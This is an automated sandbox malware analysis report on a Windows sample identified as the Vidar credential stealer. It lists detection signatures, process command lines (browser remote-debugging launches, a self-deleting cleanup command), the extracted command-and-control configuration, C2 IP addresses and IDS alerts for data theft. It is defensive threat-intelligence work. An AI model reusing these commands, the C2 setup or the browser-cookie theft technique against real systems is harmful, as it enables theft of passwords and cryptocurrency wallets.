Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SoftWareGX.exe

Overview

General Information

Sample name:SoftWareGX.exe
Analysis ID:1603227
MD5:c57c72458776a0b6a653f6c828c229f2
SHA1:2f993c6a8499b360dec51240d0b6c5faff561c80
SHA256:d7d05573e26cf40978ecbccb62c1adaf4c2363f5463cc96dc50765da6157aff6
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Compiles code to access protected / encrypted code
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Monitors registry run keys for changes
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • SoftWareGX.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\SoftWareGX.exe" MD5: C57C72458776A0B6A653F6C828C229F2)
    • csc.exe (PID: 6920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 4244 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • csc.exe (PID: 5152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 6344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 1992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1952,i,15543430524352428538,12772607436740363522,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 4956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 6240 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2136,i,9075986570920464694,11871487164673200351,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 7280 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7396 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 4348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6748 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199820567237", "Botnet": "hac22tl"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmpinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
      • 0x40bb9:$str01: MachineID:
      • 0x40be2:$str02: Work Dir: In memory
      • 0x40c7c:$str03: [Hardware]
      • 0x40cb1:$str04: VideoCard:
      • 0x40cbe:$str05: [Processes]
      • 0x40ccb:$str06: [Software]
      • 0x40cd7:$str07: information.txt
      • 0x40ce8:$str08: %s\*
      • 0x40e1f:$str08: %s\*
      • 0x3fafc:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
      • 0x3f660:$str17: build_id
      • 0x3f698:$str18: file_data
      Process Memory Space: SoftWareGX.exe PID: 6924JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: MSBuild.exe PID: 6364JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: MSBuild.exe PID: 6364JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              15.2.MSBuild.exe.400000.0.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
              • 0x40bb9:$str01: MachineID:
              • 0x40be2:$str02: Work Dir: In memory
              • 0x40c7c:$str03: [Hardware]
              • 0x40cb1:$str04: VideoCard:
              • 0x40cbe:$str05: [Processes]
              • 0x40ccb:$str06: [Software]
              • 0x40cd7:$str07: information.txt
              • 0x40ce8:$str08: %s\*
              • 0x40e1f:$str08: %s\*
              • 0x3fafc:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
              • 0x3f660:$str17: build_id
              • 0x3f698:$str18: file_data
              5.2.SoftWareGX.exe.3cd94d0.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Silenttrinity Stager Msbuild Activity
                Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6364, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49707
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 6364, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6272, ProcessName: chrome.exe
                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SoftWareGX.exe", ParentImage: C:\Users\user\Desktop\SoftWareGX.exe, ParentProcessId: 6924, ParentProcessName: SoftWareGX.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", ProcessId: 6920, ProcessName: csc.exe
                Sigma detected: Dynamic CSharp Compile Artefact
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SoftWareGX.exe, ProcessId: 6924, TargetFilename: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline

                Data Obfuscation

                barindex
                Sigma detected: Dot net compiler compiles file from suspicious location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SoftWareGX.exe", ParentImage: C:\Users\user\Desktop\SoftWareGX.exe, ParentProcessId: 6924, ParentProcessName: SoftWareGX.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", ProcessId: 6920, ProcessName: csc.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:10:58.896089+010020442471Malware Command and Control Activity Detected116.202.5.153443192.168.2.1649712TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:11:00.542949+010020518311Malware Command and Control Activity Detected116.202.5.153443192.168.2.1649713TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:11:00.542706+010020490871A Network Trojan was detected192.168.2.1649713116.202.5.153443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:11:01.987589+010020593311Malware Command and Control Activity Detected192.168.2.1649714116.202.5.153443TCP
                2025-01-30T18:11:03.084351+010020593311Malware Command and Control Activity Detected192.168.2.1649715116.202.5.153443TCP
                2025-01-30T18:11:11.168298+010020593311Malware Command and Control Activity Detected192.168.2.1649731116.202.5.153443TCP
                2025-01-30T18:11:11.404817+010020593311Malware Command and Control Activity Detected192.168.2.1649734116.202.5.153443TCP
                2025-01-30T18:11:12.444717+010020593311Malware Command and Control Activity Detected192.168.2.1649735116.202.5.153443TCP
                2025-01-30T18:11:13.475030+010020593311Malware Command and Control Activity Detected192.168.2.1649736116.202.5.153443TCP
                2025-01-30T18:11:15.328064+010020593311Malware Command and Control Activity Detected192.168.2.1649737116.202.5.153443TCP
                2025-01-30T18:11:21.448485+010020593311Malware Command and Control Activity Detected192.168.2.1649775116.202.5.153443TCP
                2025-01-30T18:11:21.694596+010020593311Malware Command and Control Activity Detected192.168.2.1649781116.202.5.153443TCP
                2025-01-30T18:11:22.735063+010020593311Malware Command and Control Activity Detected192.168.2.1649794116.202.5.153443TCP
                2025-01-30T18:11:23.943537+010020593311Malware Command and Control Activity Detected192.168.2.1649822116.202.5.153443TCP
                2025-01-30T18:11:25.115074+010020593311Malware Command and Control Activity Detected192.168.2.1649834116.202.5.153443TCP
                2025-01-30T18:11:27.116957+010020593311Malware Command and Control Activity Detected192.168.2.1649836116.202.5.153443TCP
                2025-01-30T18:11:28.240957+010020593311Malware Command and Control Activity Detected192.168.2.1649850116.202.5.153443TCP
                2025-01-30T18:11:32.951931+010020593311Malware Command and Control Activity Detected192.168.2.1649887116.202.5.153443TCP
                2025-01-30T18:11:35.094153+010020593311Malware Command and Control Activity Detected192.168.2.1649931116.202.5.153443TCP
                2025-01-30T18:11:37.038566+010020593311Malware Command and Control Activity Detected192.168.2.1649951116.202.5.153443TCP
                2025-01-30T18:11:38.084817+010020593311Malware Command and Control Activity Detected192.168.2.1649960116.202.5.153443TCP
                2025-01-30T18:11:39.044779+010020593311Malware Command and Control Activity Detected192.168.2.1649965116.202.5.153443TCP
                2025-01-30T18:11:40.451478+010020593311Malware Command and Control Activity Detected192.168.2.1649976116.202.5.153443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:11:44.715086+010028032702Potentially Bad Traffic192.168.2.1649989162.125.66.18443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:11:11.404817+010028596361Malware Command and Control Activity Detected192.168.2.1649734116.202.5.153443TCP
                2025-01-30T18:11:12.444717+010028596361Malware Command and Control Activity Detected192.168.2.1649735116.202.5.153443TCP
                2025-01-30T18:11:13.475030+010028596361Malware Command and Control Activity Detected192.168.2.1649736116.202.5.153443TCP
                2025-01-30T18:11:21.694596+010028596361Malware Command and Control Activity Detected192.168.2.1649781116.202.5.153443TCP
                2025-01-30T18:11:22.735063+010028596361Malware Command and Control Activity Detected192.168.2.1649794116.202.5.153443TCP
                2025-01-30T18:11:23.943537+010028596361Malware Command and Control Activity Detected192.168.2.1649822116.202.5.153443TCP
                2025-01-30T18:11:25.115074+010028596361Malware Command and Control Activity Detected192.168.2.1649834116.202.5.153443TCP
                2025-01-30T18:11:27.116957+010028596361Malware Command and Control Activity Detected192.168.2.1649836116.202.5.153443TCP
                2025-01-30T18:11:28.240957+010028596361Malware Command and Control Activity Detected192.168.2.1649850116.202.5.153443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-30T18:10:56.127482+010028593781Malware Command and Control Activity Detected192.168.2.1649709116.202.5.153443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199820567237", "Botnet": "hac22tl"}
                Multi AV Scanner detection for submitted file
                Source: SoftWareGX.exeVirustotal: Detection: 13%Perma Link
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                Machine Learning detection for sample
                Source: SoftWareGX.exeJoe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00409C4D CryptUnprotectData,15_2_00409C4D
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.16:49989 version: TLS 1.2
                Source: SoftWareGX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: MSBuildsers\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000002019000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb| source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb| source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00421A6B FindFirstFileA,15_2_00421A6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00420AD3 FindFirstFileA,15_2_00420AD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040F379 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,15_2_0040F379
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040BC0C FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,15_2_0040BC0C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00422DC5 FindFirstFileA,FindNextFileA,15_2_00422DC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040A5E0 FindFirstFileA,FindNextFileA,CopyFileA,DeleteFileA,memset,CopyFileA,DeleteFileA,memset,15_2_0040A5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00401590 FindFirstFileA,15_2_00401590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040CF73 FindFirstFileA,FindNextFileA,15_2_0040CF73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041FF89 FindFirstFileA,memset,memset,memset,memset,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,15_2_0041FF89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 41MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49715 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.16:49713 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.16:49709 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49731 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.16:49713
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49734 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49734 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.16:49712
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49714 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49736 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49736 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49735 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49735 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49737 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49781 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49781 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49775 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49822 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49822 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49794 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49794 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49850 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49850 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49834 -> 116.202.5.153:443
